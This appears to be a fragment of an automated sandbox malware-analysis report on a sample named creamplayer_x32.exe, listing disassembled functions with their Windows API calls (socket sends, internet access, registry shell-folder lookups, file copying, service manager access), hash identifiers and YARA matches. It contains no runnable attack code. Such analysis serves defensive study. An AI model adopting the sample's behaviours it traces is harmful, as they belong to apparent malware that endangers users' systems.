                                                                                                    • Opcode ID: b3939a01fa3a1185ddba5122bc593cde9dc8bd1e1c2eabb61b87dab3e4c18119
                                                                                                    • Instruction ID: 2533d3d238de4453824918644633466c6923f18ecc45869b85252f61657cec01
                                                                                                    • Opcode Fuzzy Hash: b3939a01fa3a1185ddba5122bc593cde9dc8bd1e1c2eabb61b87dab3e4c18119
                                                                                                    • Instruction Fuzzy Hash: 9BF0A0A0549212FAD31216614E9DEB726AC9B16358B2000BBBA43F60E1C5BC094BE13F
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 257cf569f835299bb370de6763997442ef6cfaa37c0c109c1212d82d27d3228e
                                                                                                    • Instruction ID: 7a1deb832a51dfd0fe5b8573f103a832b3fc4e9e8fd847d15f26e17abf29bd51
                                                                                                    • Opcode Fuzzy Hash: 257cf569f835299bb370de6763997442ef6cfaa37c0c109c1212d82d27d3228e
                                                                                                    • Instruction Fuzzy Hash: 53513C71905256DFCB48DF68D5546AABBB1FF08320F20819EE8699B390DB75DD10CFA0
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 02D436A7
                                                                                                      • Part of subcall function 02D42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D42432
                                                                                                      • Part of subcall function 02D42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D42445
                                                                                                      • Part of subcall function 02D42420: RtlEnterCriticalSection.NTDLL(?), ref: 02D42454
                                                                                                      • Part of subcall function 02D42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42469
                                                                                                      • Part of subcall function 02D42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D42470
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                    • String ID:
                                                                                                    • API String ID: 1601054111-0
                                                                                                    • Opcode ID: a6c0cdc9d7fe45b02db159afe9ad5435df034e7dab67e61b1ca5cf769a767afc
                                                                                                    • Instruction ID: 75539e92f42f2e8c60ef1cbdb8b62d1e20c8a1169f21e739f01541fdd3f7beda
                                                                                                    • Opcode Fuzzy Hash: a6c0cdc9d7fe45b02db159afe9ad5435df034e7dab67e61b1ca5cf769a767afc
                                                                                                    • Instruction Fuzzy Hash: B411E3B5500209ABDF219F18DC89FAA3BA9EF44354F204556FE96CA390CF74DC60CBA4
                                                                                                    APIs
                                                                                                    • __beginthreadex.LIBCMT ref: 02D51106
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D4997E,00000000), ref: 02D51137
                                                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,00000002,02D4997E,00000000), ref: 02D51145
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                    • String ID:
                                                                                                    • API String ID: 1685284544-0
                                                                                                    • Opcode ID: 16f28504b6b980d835f940458285125d78c64da0d318f3467d07ef327062776e
                                                                                                    • Instruction ID: 35c5bd6e9e8db19b397d118fb24d116b23a3317258e28a902099135f7f071ba0
                                                                                                    • Opcode Fuzzy Hash: 16f28504b6b980d835f940458285125d78c64da0d318f3467d07ef327062776e
                                                                                                    • Instruction Fuzzy Hash: 83F068752402105BEB209E58DC84F9573E8EF48765F24055AF958D7380D7B1EC92DA90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, xrefs: 004018C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcmpi
                                                                                                    • String ID: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                    • API String ID: 1586166983-1745385716
                                                                                                    • Opcode ID: e996b7c684cd2999ebb3ed5567f2a52e25b5df5bfcb4dfd29befef79418b0317
                                                                                                    • Instruction ID: cb65507615804f4a248e479003f40082dc0f9234b689d72aaf2b97bf6fff0cd4
                                                                                                    • Opcode Fuzzy Hash: e996b7c684cd2999ebb3ed5567f2a52e25b5df5bfcb4dfd29befef79418b0317
                                                                                                    • Instruction Fuzzy Hash: 23E06530E4410ADFDB109FB09949A9876B0AB04300B2180779407F61D0DA3C894A6F5E
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(02D7529C), ref: 02D41ABA
                                                                                                    • WSAStartup.WS2_32(00000002,00000000), ref: 02D41ACB
                                                                                                    • InterlockedExchange.KERNEL32(02D752A0,00000000), ref: 02D41AD7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                    • String ID:
                                                                                                    • API String ID: 1856147945-0
                                                                                                    • Opcode ID: 319a0b355634630ee3a16eff674fd26043646c9042825168f9de3f600fbe473a
                                                                                                    • Instruction ID: cca69746da385d066493b780368b6fbd9e5a7d1e6fd8517881afad385d61b314
                                                                                                    • Opcode Fuzzy Hash: 319a0b355634630ee3a16eff674fd26043646c9042825168f9de3f600fbe473a
                                                                                                    • Instruction Fuzzy Hash: 50D05E31D842046BE220A6A0BD0FA78776CD706712FD00651FDA9C43C0FB56AD6485B7
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InternetOpen
                                                                                                    • String ID: "~*
                                                                                                    • API String ID: 2038078732-1235269204
                                                                                                    • Opcode ID: bc96f0a1c9213f91d6fb44eb68bac16642cd78aa818e8c5df57bddac167fa2d5
                                                                                                    • Instruction ID: bf472aad9c009e752a4a27b0e90bdb44fed97f9c26660e79cd5435b0fc37df68
                                                                                                    • Opcode Fuzzy Hash: bc96f0a1c9213f91d6fb44eb68bac16642cd78aa818e8c5df57bddac167fa2d5
                                                                                                    • Instruction Fuzzy Hash: 69D0C9F080DA41DFD340BF38A249228BFF0EB04600F01496EE5CACA345E6758899CB93
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?,00000001), ref: 0040D50F
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040D5E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 71445658-2036018995
                                                                                                    • Opcode ID: 376880c1191f12d88b74a8f18cecfdcbd106edf6316ff717872b685b05796f94
                                                                                                    • Instruction ID: 55ec6d6f3b03e81576498b8840f9a800843ca736c81a2eda87994de1e90d74ea
                                                                                                    • Opcode Fuzzy Hash: 376880c1191f12d88b74a8f18cecfdcbd106edf6316ff717872b685b05796f94
                                                                                                    • Instruction Fuzzy Hash: 01C04CA0659201F9E5141A515E59F32555C5704749F30053B3A43B10D1C5B84106E43F
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID: SmartImageDrive
                                                                                                    • API String ID: 3535843008-2364236983
                                                                                                    • Opcode ID: a1f13be4476fdac63d7e8836af3cfd54e6c0ed7076d3e34dec5a5d3afe841622
                                                                                                    • Instruction ID: 5e4103d5c4c69ba00cd9cff489054cbf602ffebd292b4134ee8da08e8b7d7de3
                                                                                                    • Opcode Fuzzy Hash: a1f13be4476fdac63d7e8836af3cfd54e6c0ed7076d3e34dec5a5d3afe841622
                                                                                                    • Instruction Fuzzy Hash: 70B0922A989020A7D5212AA14F09C5F6969988AB24326403B3542321E34ABC1806A7FE
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D44BF2
                                                                                                      • Part of subcall function 02D41BA7: __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                                      • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                                      • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                                      • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                                      • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                                      • Part of subcall function 02D4D0ED: __EH_prolog.LIBCMT ref: 02D4D0F2
                                                                                                      • Part of subcall function 02D4D0ED: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4D171
                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1927618982-0
                                                                                                    • Opcode ID: 48b33907149743c1f532bc6a00ea0a97db259a1e1a010561422801f1f6f04ac8
                                                                                                    • Instruction ID: 6d817debffec7186a5474b6e5892b1fb25b90a40cc6a1174dc6a8182a0f29776
                                                                                                    • Opcode Fuzzy Hash: 48b33907149743c1f532bc6a00ea0a97db259a1e1a010561422801f1f6f04ac8
                                                                                                    • Instruction Fuzzy Hash: F351F571D042489FDB15DFA8C484AEEFBB9EF08314F24819AE905AB351EB309E44CF61
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42D47
                                                                                                    • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
                                                                                                      • Part of subcall function 02D494FE: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4950C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Send
                                                                                                    • String ID:
                                                                                                    • API String ID: 1282938840-0
                                                                                                    • Opcode ID: 8f59075e46354e9b1113f1a88792b720078e241772422b6d8e498ca062803f03
                                                                                                    • Instruction ID: e59050fe6817631bef8a101a0bcf935391b218fc689f789dac88a5eceb0be6ed
                                                                                                    • Opcode Fuzzy Hash: 8f59075e46354e9b1113f1a88792b720078e241772422b6d8e498ca062803f03
                                                                                                    • Instruction Fuzzy Hash: 040184B5904205EFD7205F95D99896BBBEDEF453A4B20092EF89983300DF749D40CBB1
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D473FC
                                                                                                    • shutdown.WS2_32(?,00000002), ref: 02D47405
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastshutdown
                                                                                                    • String ID:
                                                                                                    • API String ID: 1920494066-0
                                                                                                    • Opcode ID: f6358cf9f10d853882aa593eda46e824c9afad70f2462181e0fc787f6d692ddd
                                                                                                    • Instruction ID: a5e446f2c6043c13106fca64743bff2b9522ff011fc1854a973c543cfa1a0932
                                                                                                    • Opcode Fuzzy Hash: f6358cf9f10d853882aa593eda46e824c9afad70f2462181e0fc787f6d692ddd
                                                                                                    • Instruction Fuzzy Hash: 5FF0B431A04310CFD7109F54E414B5ABBE5EF093A5F408819ED9997380DB34AC10CBA1
                                                                                                    APIs
                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,004029CF,00000000), ref: 00403AC5
                                                                                                      • Part of subcall function 0040396C: GetVersionExA.KERNEL32 ref: 0040398B
                                                                                                    • HeapDestroy.KERNEL32 ref: 00403B04
                                                                                                      • Part of subcall function 00403E8B: HeapAlloc.KERNEL32(00000000,00000140,00403AED,000003F8), ref: 00403E98
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2507506473-0
                                                                                                    • Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                                    • Instruction ID: 6cfbffc07cc949aaff5a0c7b176a66dfdd2709477ee239bc59097809897624f9
                                                                                                    • Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                                    • Instruction Fuzzy Hash: F9F065706503029EDB209F709E467263EA89740747F10443FFD45F41D1EFB88684E90D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3132538880-0
                                                                                                    • Opcode ID: f16a5085307743866f47d5818394b671e94143c078b74744ccdd6a1b15b5cf52
                                                                                                    • Instruction ID: 5c5709a2ab1144a6dd2fb6f55f1319fb92d2e706694a44391628ffe25b6aec9a
                                                                                                    • Opcode Fuzzy Hash: f16a5085307743866f47d5818394b671e94143c078b74744ccdd6a1b15b5cf52
                                                                                                    • Instruction Fuzzy Hash: 68B00136404814DBCBA51FA0EF0D5A87A72AB4831AF1200B9E386B00708F351A69AF1E
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D4511E
                                                                                                      • Part of subcall function 02D43D7E: htons.WS2_32(?), ref: 02D43DA2
                                                                                                      • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DB9
                                                                                                      • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: htonl$H_prologhtons
                                                                                                    • String ID:
                                                                                                    • API String ID: 4039807196-0
                                                                                                    • Opcode ID: b61684dab4cac0d6b7fb5287d6daf80720599425e69cb2a84dfe3538a0568fea
                                                                                                    • Instruction ID: 5317ef82ab1d4f8f2abeda68e13181899017fad1a733b563700185286bd8dee8
                                                                                                    • Opcode Fuzzy Hash: b61684dab4cac0d6b7fb5287d6daf80720599425e69cb2a84dfe3538a0568fea
                                                                                                    • Instruction Fuzzy Hash: D18125B5D0424A8FCF05DFA8E090AEEBBB5EF49214F10819AD855B7340EB755A05CF74
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 31f8590b0dd1c24646cbf07f3c632ebabbc2d903f78ee710938f84ab34b4d9d3
                                                                                                    • Instruction ID: 3e8ef4ca87abc9438b372a251d094d8446b4983c529c965e1166a781f07d674b
                                                                                                    • Opcode Fuzzy Hash: 31f8590b0dd1c24646cbf07f3c632ebabbc2d903f78ee710938f84ab34b4d9d3
                                                                                                    • Instruction Fuzzy Hash: 9C418EB250C704AFE301BF19ECC56BAFBE5EF98660F16892DE6C447700D63658008A97
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D4D9BB
                                                                                                      • Part of subcall function 02D41A01: TlsGetValue.KERNEL32 ref: 02D41A0A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3700342317-0
                                                                                                    • Opcode ID: d5760a7911b955dc0073983af0ca22b902a0a2c0dab47d612b5f839035c1e275
                                                                                                    • Instruction ID: 8db6f25d52eee0b2effa0a61d94e5e647ac220bcdc0a2ad70716a103938472a7
                                                                                                    • Opcode Fuzzy Hash: d5760a7911b955dc0073983af0ca22b902a0a2c0dab47d612b5f839035c1e275
                                                                                                    • Instruction Fuzzy Hash: 83212FB2908209AFDB04DFA9D445AFEBBFAEF59314F10415EE904A7340DB71AD01CBA1
                                                                                                    APIs
                                                                                                    • SHGetSpecialFolderPathA.SHELL32 ref: 02DDEA14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderPathSpecial
                                                                                                    • String ID:
                                                                                                    • API String ID: 994120019-0
                                                                                                    • Opcode ID: ab41f332bdb72f8f8eb5bd0f12e9302dd1c082b0985fee7642b4d0df229e0997
                                                                                                    • Instruction ID: 60ec4c5b959329fa2f5778b67708a88b79c8cc47627d89d47cd169b8aa0a72d2
                                                                                                    • Opcode Fuzzy Hash: ab41f332bdb72f8f8eb5bd0f12e9302dd1c082b0985fee7642b4d0df229e0997
                                                                                                    • Instruction Fuzzy Hash: E70128F390C301AFE7099E18ECC2768F794EF54220F09093DD7C04B394D63568518693
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D4D54B
                                                                                                      • Part of subcall function 02D426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
                                                                                                      • Part of subcall function 02D426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
                                                                                                      • Part of subcall function 02D426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63163), ref: 02D42738
                                                                                                      • Part of subcall function 02D426DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
                                                                                                      • Part of subcall function 02D426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 4293676635-0
                                                                                                    • Opcode ID: e2cbbe67b0ceb0738a77dfc74e26956b6c89bf1cabde390869e14944b3f63568
                                                                                                    • Instruction ID: 4f7ccc2c8e0fcf97103be1beda233b044887446c676cf146dc3ea60a9ecff4df
                                                                                                    • Opcode Fuzzy Hash: e2cbbe67b0ceb0738a77dfc74e26956b6c89bf1cabde390869e14944b3f63568
                                                                                                    • Instruction Fuzzy Hash: 9F01CEB0900B088FC328CF0AC548996FBE5EF88304B15C5AFD4499B722E771AA40CF94
                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(?), ref: 0040D06C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: b6ffc2b7e77549ca374be7c8e75bdd03675a77abcb92516b724ecc3982b4a31d
                                                                                                    • Instruction ID: 1456751b5a99db78de43e346b0be6a0e5ccfdf10eee6c1b580c6771a8926aa97
                                                                                                    • Opcode Fuzzy Hash: b6ffc2b7e77549ca374be7c8e75bdd03675a77abcb92516b724ecc3982b4a31d
                                                                                                    • Instruction Fuzzy Hash: 2DF03A31E14119DFCB04DFA8D8A4AECB7B1FF08710F91802AE416BB290D774A84ACB15
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D4D32A
                                                                                                      • Part of subcall function 02D527B5: _malloc.LIBCMT ref: 02D527CD
                                                                                                      • Part of subcall function 02D4D546: __EH_prolog.LIBCMT ref: 02D4D54B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4254904621-0
                                                                                                    • Opcode ID: c24633032e929df14316546960edca0ddaa71371b9fbd65d437ed068208f1336
                                                                                                    • Instruction ID: e58433f83b8bdacae2a95ccee5053b55aa72f44e86a94e63ef8b03ac32a2ef6f
                                                                                                    • Opcode Fuzzy Hash: c24633032e929df14316546960edca0ddaa71371b9fbd65d437ed068208f1336
                                                                                                    • Instruction Fuzzy Hash: 7CE0C270A04105ABDF0CEF68DC0877E77A2EB84704F0041AEBC09E2340EF709D008A20
                                                                                                    APIs
                                                                                                      • Part of subcall function 02D548BA: __getptd_noexit.LIBCMT ref: 02D548BB
                                                                                                      • Part of subcall function 02D548BA: __amsg_exit.LIBCMT ref: 02D548C8
                                                                                                      • Part of subcall function 02D52493: __getptd_noexit.LIBCMT ref: 02D52497
                                                                                                      • Part of subcall function 02D52493: __freeptd.LIBCMT ref: 02D524B1
                                                                                                      • Part of subcall function 02D52493: RtlExitUserThread.NTDLL(?,00000000,?,02D52473,00000000), ref: 02D524BA
                                                                                                    • __XcptFilter.LIBCMT ref: 02D5247F
                                                                                                      • Part of subcall function 02D57944: __getptd_noexit.LIBCMT ref: 02D57948
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                    • String ID:
                                                                                                    • API String ID: 1405322794-0
                                                                                                    • Opcode ID: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
                                                                                                    • Instruction ID: d43a874d0d38e1ef4ca1522a6d8ff7637b77c63e529d38bd5383f544296f4a54
                                                                                                    • Opcode Fuzzy Hash: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
                                                                                                    • Instruction Fuzzy Hash: 33E0ECB19046109FFF08ABA0E909E2D7BA6EF04711F200488E9029B361DAB89D44DE31
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ManagerOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889721586-0
                                                                                                    • Opcode ID: faa819060fe9011425c503b783bb8b7d9f2085a3bf2ea5847d6f517437795d43
                                                                                                    • Instruction ID: 91e4a2d6cc8ff6e64853bb2de22b9c9adcb6bc17cc58e2c5d35efb3fa643ddba
                                                                                                    • Opcode Fuzzy Hash: faa819060fe9011425c503b783bb8b7d9f2085a3bf2ea5847d6f517437795d43
                                                                                                    • Instruction Fuzzy Hash: 3EC08CB0808105FDC7400A904FD8D3B24AC69083093B0407BA10BB00C0C5BC598AB52E
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CopyFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 1304948518-0
                                                                                                    • Opcode ID: 1f4538b9efa5d3dbcc4b3440fc9bc949f63a61dcb54361b095040e23360b1ed7
                                                                                                    • Instruction ID: 944eb226a14a80c6989878ba7bdf0818dbfa01dfd1088787936cfd16164d646e
                                                                                                    • Opcode Fuzzy Hash: 1f4538b9efa5d3dbcc4b3440fc9bc949f63a61dcb54361b095040e23360b1ed7
                                                                                                    • Instruction Fuzzy Hash: B9C02B309000049FCA04CF948D99FD173BC4305300F0245B2713AF31C0CB38564E8B2E
                                                                                                    APIs
